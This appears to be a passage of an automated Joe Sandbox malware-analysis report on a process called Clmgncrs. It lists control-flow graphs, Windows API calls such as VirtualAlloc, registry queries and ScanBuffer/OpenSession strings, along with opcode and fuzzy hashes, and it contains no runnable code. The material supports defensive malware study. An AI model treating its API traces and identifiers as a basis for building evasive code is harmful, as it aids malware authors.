5107->5101 5121 29818bc-29818c3 Sleep 5107->5121 5108->5109 5112 2981ad0 5108->5112 5115 2981b04 5109->5115 5116 2981ae5-2981af8 5109->5116 5117 2981978-2981987 call 2981668 5110->5117 5118 2981952-2981964 5110->5118 5113 2981918-2981926 5111->5113 5114 2981901-298190f 5111->5114 5112->5109 5123 2981928-2981942 call 298159c 5113->5123 5124 2981994 5113->5124 5114->5113 5122 2981911 5114->5122 5125 2981b09-2981b1b 5115->5125 5116->5125 5126 2981afa-2981aff call 298159c 5116->5126 5132 2981999-29819d2 5117->5132 5136 2981989-2981993 5117->5136 5127 2981968-2981976 5118->5127 5128 2981966 5118->5128 5121->5102 5122->5113 5123->5132 5124->5132 5126->5125 5127->5132 5128->5127
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0298186C
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 02981882
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: b46b512138b6ad634877d4a53894921a6a9e09f67c7a1c96825cd7302f1b5177
                                                                                                                                            • Instruction ID: 2e22ec370c97a64ff4165ce79bb45bcf7ddc9c4bc7cdaed7736df0d2bc480326
                                                                                                                                            • Opcode Fuzzy Hash: b46b512138b6ad634877d4a53894921a6a9e09f67c7a1c96825cd7302f1b5177
                                                                                                                                            • Instruction Fuzzy Hash: 86B1DF72A402118BCB15DF68E880366FBE5EF85325F1C8AAED45D8B385DB70D853CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5191 29a765c-29a7696 MulDiv 5192 29a7698-29a769f call 29a7618 5191->5192 5193 29a76ae-29a76e7 call 29a0204 call 29a02a4 call 29a0308 5191->5193 5192->5193 5198 29a76a1-29a76a9 call 2984820 5192->5198 5204 29a76e9-29a76f4 call 29a0538 5193->5204 5205 29a7701-29a7716 call 29838d0 5193->5205 5198->5193 5209 29a76f9-29a76fc call 29a0274 5204->5209 5209->5205
                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(00000008,02A1A374,00000048), ref: 029A7682
                                                                                                                                              • Part of subcall function 029A7618: SelectObject.GDI32(00000000,02A1A380), ref: 029A7633
                                                                                                                                            Strings
                                                                                                                                            • MS Shell Dlg 2, xrefs: 029A76EC
                                                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 029A76D8
                                                                                                                                            • Tahoma, xrefs: 029A76A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectSelect
                                                                                                                                            • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                                                            • API String ID: 1517587568-1011973972
                                                                                                                                            • Opcode ID: 54e334919ddd790d12955e63f4b14e11634bde6d33a479fa726cdaf4eed160a2
                                                                                                                                            • Instruction ID: 38af1989fa052e3b4d87be50732b2198339344b3418f075d4fca7fd32d457093
                                                                                                                                            • Opcode Fuzzy Hash: 54e334919ddd790d12955e63f4b14e11634bde6d33a479fa726cdaf4eed160a2
                                                                                                                                            • Instruction Fuzzy Hash: 0B117370A40348AFDB41EFE8C862AADB7FAEB85700F5144A4E840D7650DB31AD11CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5214 299ea38-299ea66 GetClassInfoA 5215 299ea68-299ea70 5214->5215 5216 299ea72-299ea74 5214->5216 5215->5216 5217 299ea91-299eac6 call 298738c 5215->5217 5218 299ea87-299ea8c RegisterClassA 5216->5218 5219 299ea76-299ea82 UnregisterClassA 5216->5219 5222 299eac8-299eace call 299e97c 5217->5222 5223 299eadc-299eae2 5217->5223 5218->5217 5219->5218 5225 299ead3-299ead7 SetWindowLongA 5222->5225 5225->5223
                                                                                                                                            APIs
                                                                                                                                            • GetClassInfoA.USER32(02A197F8,029EAB1C,?), ref: 0299EA59
                                                                                                                                            • UnregisterClassA.USER32(029EAB1C,02A197F8), ref: 0299EA82
                                                                                                                                            • RegisterClassA.USER32(029EAAF8), ref: 0299EA8C
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0299EAD7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4025006896-0
                                                                                                                                            • Opcode ID: dcc92b45744b4b9fb120a15c8d4fe747f763d65bf6e9679c432c2ef7b6513138
                                                                                                                                            • Instruction ID: ba45364e118cf5fb9c354339fda94bbb047f33673e2d54d963d00aa2c17b9349
                                                                                                                                            • Opcode Fuzzy Hash: dcc92b45744b4b9fb120a15c8d4fe747f763d65bf6e9679c432c2ef7b6513138
                                                                                                                                            • Instruction Fuzzy Hash: 8E01A171A80101ABDE00FB9CDC80FDB779EFB58324F184911B951EB2A1CA31D851CB61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029A04A2), ref: 029A0374
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,029A04A2), ref: 029A03DF
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 029A0444
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: cd8f067a29518bbeb85089f4d84f3c06aa81152d22b0ff5613b8d1bdc7d3d6f2
                                                                                                                                            • Instruction ID: 8ee12e5a0bfcdb1bb43fd252ed6403cfdc3058adc40882204c6a103dfd084fa0
                                                                                                                                            • Opcode Fuzzy Hash: cd8f067a29518bbeb85089f4d84f3c06aa81152d22b0ff5613b8d1bdc7d3d6f2
                                                                                                                                            • Instruction Fuzzy Hash: 9241A631A04309BFEB11EBA4C9A1B9EB7FAFF84304F148469E845A7251DB759F05DB80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5344 299f2a8-299f2f2 call 2985248 5347 299f30b-299f30d 5344->5347 5348 299f2f4-299f306 call 298c148 call 298412c 5344->5348 5350 299f313-299f327 5347->5350 5351 299f4d4-299f4fb 5347->5351 5348->5347 5355 299f329-299f343 5350->5355 5353 299f4fd-299f50c 5351->5353 5354 299f525-299f528 5351->5354 5357 299f50e 5353->5357 5358 299f513-299f523 5353->5358 5359 299f539-299f555 5354->5359 5360 299f52a-299f52c 5354->5360 5361 299f35d-299f361 5355->5361 5362 299f345-299f358 5355->5362 5357->5358 5358->5359 5372 299f55a-299f55c 5359->5372 5360->5359 5363 299f52e-299f532 5360->5363 5365 299f363-299f372 5361->5365 5366 299f3d7-299f3d9 5361->5366 5364 299f4cb-299f4ce 5362->5364 5363->5359 5369 299f534 5363->5369 5364->5351 5364->5355 5370 299f3a4-299f3cc call 29856b8 5365->5370 5371 299f374-299f3a2 call 29856b8 5365->5371 5367 299f3db-299f3df 5366->5367 5368 299f420-299f424 5366->5368 5374 299f3e1-299f3eb 5367->5374 5375 299f403-299f41b 5367->5375 5376 299f499-299f4b0 5368->5376 5377 299f426-299f42e 5368->5377 5369->5359 5392 299f3cf-299f3d2 5370->5392 5371->5392 5379 299f55e-299f561 call 299f880 5372->5379 5380 299f566-299f56b 5372->5380 5374->5375 5387 299f3ed-299f3fe call 298fe44 5374->5387 5382 299f4c7 5375->5382 5381 299f4b2-299f4b6 5376->5381 5376->5382 5388 299f46e-299f497 5377->5388 5389 299f430-299f46c call 29856b8 5377->5389 5379->5380 5385 299f589-299f59b 5380->5385 5386 299f56d-299f57a 5380->5386 5381->5382 5391 299f4b8-299f4c4 5381->5391 5382->5364 5395 299f59d-299f5ad SysFreeString 5385->5395 5396 299f5af 5385->5396 5393 299f57c-299f580 call 2985694 5386->5393 5394 299f585-299f587 5386->5394 5387->5375 5388->5382 5389->5382 5391->5382 5392->5382 5393->5394 5394->5385 5394->5386 5395->5395 5395->5396
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0299F5A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                                            • Opcode ID: 3e1ec927409ab28bb6dc10fbc3e659b2ae52c1145684c9f084882a3d396699b2
                                                                                                                                            • Instruction ID: 9e517c7f3d2ea5769022dc15d77d95ed53023ae405d146aab67343ad982a7314
                                                                                                                                            • Opcode Fuzzy Hash: 3e1ec927409ab28bb6dc10fbc3e659b2ae52c1145684c9f084882a3d396699b2
                                                                                                                                            • Instruction Fuzzy Hash: 1EB1E174A016089FDB10CFA8D480AADFBF6FF89324F248569E809EB760D735A845CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,029A0524), ref: 029A04F2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: QueryValue
                                                                                                                                            • String ID: MS Shell Dlg 2
                                                                                                                                            • API String ID: 3660427363-3198668166
                                                                                                                                            • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                            • Instruction ID: cc69fd0e9653b3991c4f0a87e54a1a2bf803ad33f6cf2596b73eb47cf316aabc
                                                                                                                                            • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                            • Instruction Fuzzy Hash: 2BF030623092086BD704FAAD9D40FAB7BDDDBC5750F05803AB94CC7240DA21DC0987B5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ffc62c8a795cdba3c95c840fb379f549ef177c81c8d269e1d67dca3f486e3e8
                                                                                                                                            • Instruction ID: ce374b68530f55b2484267d1130ab7cfcc3cafb0982c1cd0ae4fc15069a08f8a
                                                                                                                                            • Opcode Fuzzy Hash: 6ffc62c8a795cdba3c95c840fb379f549ef177c81c8d269e1d67dca3f486e3e8
                                                                                                                                            • Instruction Fuzzy Hash: AF416B75C40206CFDB24EF64D4847AA7BE9FF49325F2D695AE8088B240CB34D9A2CF55
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClearVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                            • Opcode ID: 953bfe9d18f7f9f0c99c00b0179d4b439ebc0b8704d7b98d0934842a1d081f23
                                                                                                                                            • Instruction ID: 194215c3812f7f388b11abb49741969271490a50e8718c0c38c61d122d464c03
                                                                                                                                            • Opcode Fuzzy Hash: 953bfe9d18f7f9f0c99c00b0179d4b439ebc0b8704d7b98d0934842a1d081f23
                                                                                                                                            • Instruction Fuzzy Hash: EDF0C26470011086BB257B38CCC467D239E6F81354BDC7865E0879BA11CB35CC0BC723
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                            • Opcode ID: f2a64bd8e0af24b91cb871e90705f05e4ec4141a71d36be1446cc7c522c39933
                                                                                                                                            • Instruction ID: de25dd94fbdf78f8a1e668cfdb8bb706c22186d905c146e235ac19107893cb61
                                                                                                                                            • Opcode Fuzzy Hash: f2a64bd8e0af24b91cb871e90705f05e4ec4141a71d36be1446cc7c522c39933
                                                                                                                                            • Instruction Fuzzy Hash: A6316172A00208EFEB11EFA8C884AAE77ECEB49314FA85566F906D3A50D734D951CB51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 0298FAED
                                                                                                                                              • Part of subcall function 0298F6D0: VariantClear.OLEAUT32(?), ref: 0298F6DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 274517740-0
                                                                                                                                            • Opcode ID: bf4df6483d4f6393cc1acff3c488aecfd3cf0ee4d11dae06258e75e688600ed7
                                                                                                                                            • Instruction ID: e47f99cadea81db31516a5ffe0036ce099c7aac7ab77ea273d5be9aedfd377a3
                                                                                                                                            • Opcode Fuzzy Hash: bf4df6483d4f6393cc1acff3c488aecfd3cf0ee4d11dae06258e75e688600ed7
                                                                                                                                            • Instruction Fuzzy Hash: 7311862070021057CB24BF68C890A6763EAEF8579079CB86AA44E8BA15DB34CC41CA61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029873CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                            • Instruction ID: cb04298ec1b27ed9a845fa02d7853e875683c050aec3d26f2d90f8f5d548bfd2
                                                                                                                                            • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                            • Instruction Fuzzy Hash: 5AF09DB6700158BF9B80EE9DDC80EDBB7ECEB8C2A4B154165FA0CD7200D630ED108BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029873CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                            • Instruction ID: e463a544bf800d214341687624634b104f4c43ef995c50273294bf92cf68ff5c
                                                                                                                                            • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                            • Instruction Fuzzy Hash: CAF09DB6600158BF8B80EE9DDC80EDBB7ECEB8C2A4B154165FA0CD7200D630ED108BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersion.KERNEL32(00000000,029E967E), ref: 029E9612
                                                                                                                                              • Part of subcall function 029C7420: GetCurrentProcessId.KERNEL32(?,00000000,029C7598), ref: 029C7441
                                                                                                                                              • Part of subcall function 029C7420: GetCurrentThreadId.KERNEL32 ref: 029C748F
                                                                                                                                              • Part of subcall function 029C7420: GlobalAddAtomA.KERNEL32(00000000), ref: 029C74C5
                                                                                                                                              • Part of subcall function 029C7420: RegisterClipboardFormatA.USER32(00000000), ref: 029C74DB
                                                                                                                                              • Part of subcall function 029C7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029C755F
                                                                                                                                              • Part of subcall function 029C7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 029C7570
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2893432522-0
                                                                                                                                            • Opcode ID: 79db2cd99d03b3e13f471f6fcf823a6bc353cb294273048d75a0599d0f273da5
                                                                                                                                            • Instruction ID: 7987eacda50cae04e41d5df8537c1e904976ce419c5de3bcc1b7a6a28b5d2cb3
                                                                                                                                            • Opcode Fuzzy Hash: 79db2cd99d03b3e13f471f6fcf823a6bc353cb294273048d75a0599d0f273da5
                                                                                                                                            • Instruction Fuzzy Hash: 41F068B969E1409FE723FF68EE8186577AAE7CA7103924835D40187618CD749C61CE64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B0EB38,?,029DD7E7,ScanBuffer,02A169E4,029E7AE0,OpenSession,02A169E4,029E7AE0,ScanBuffer,02A169E4,029E7AE0,OpenSession), ref: 0298D587
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                            • Opcode ID: af4efeb3384cbdb9fbad43840b29a484288c8f23093bd2a35eb8551050a3dc1a
                                                                                                                                            • Instruction ID: 6055ef514eefccb2f46009b0585056bc9a355a9c113676b78bfa5076e4199b7a
                                                                                                                                            • Opcode Fuzzy Hash: af4efeb3384cbdb9fbad43840b29a484288c8f23093bd2a35eb8551050a3dc1a
                                                                                                                                            • Instruction Fuzzy Hash: 77D022A2B006542BE700F16C0C818FB32CE8FC8720F48013A7999CB3C0FA908E100BD2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            • Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                                                            • Instruction ID: 1365759023c01d52c5beac60479d1de1b1d67bf2a061e51436e1a178be79373a
                                                                                                                                            • Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                                                            • Instruction Fuzzy Hash: 8CC08CBD10A3036DEF143F708900A3A276DAEC1200B8C147DEC00C8041E738C463EC22
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 0298167E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 4a5d77be938861860ec41a2c60854bf6397e675a317a3c5d10cbeaca1c32830c
                                                                                                                                            • Instruction ID: 863dfe891d6a9f96d84764fbab150b600edea9991181141705e8f5abfc81718f
                                                                                                                                            • Opcode Fuzzy Hash: 4a5d77be938861860ec41a2c60854bf6397e675a317a3c5d10cbeaca1c32830c
                                                                                                                                            • Instruction Fuzzy Hash: 64F049F0B403008FDB06DF799D40312BAD6EB89354F148579D609DB788EB7188028B00
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02981740
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 501ba90d202f0c4227ea0e75cc03c58bd569c0bda4b528efe4d6710d20a29d63
                                                                                                                                            • Instruction ID: f449d0ac567f65c3a71cfd6c1896faea99e973e3abbf94a51e09b22ce948e075
                                                                                                                                            • Opcode Fuzzy Hash: 501ba90d202f0c4227ea0e75cc03c58bd569c0bda4b528efe4d6710d20a29d63
                                                                                                                                            • Instruction Fuzzy Hash: 33F09AB2B40656ABD7119E5A9C90B83BB94FF40360F190939EA4D97344DB71E812CB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 029817A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                            • Opcode ID: 41c53e77730eaf3576ffcb5068da0b33a1fee8a52350b1bd2d523e2eb39b8ee8
                                                                                                                                            • Instruction ID: a8446b524ca4b8a68c4f0d488b4f686dc244b0726124c53d876458a789060018
                                                                                                                                            • Opcode Fuzzy Hash: 41c53e77730eaf3576ffcb5068da0b33a1fee8a52350b1bd2d523e2eb39b8ee8
                                                                                                                                            • Instruction Fuzzy Hash: E0E04F713003416ED7102E7D5C407526AD9AF89771F2C4A69F559DB2D1D760E8418760
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%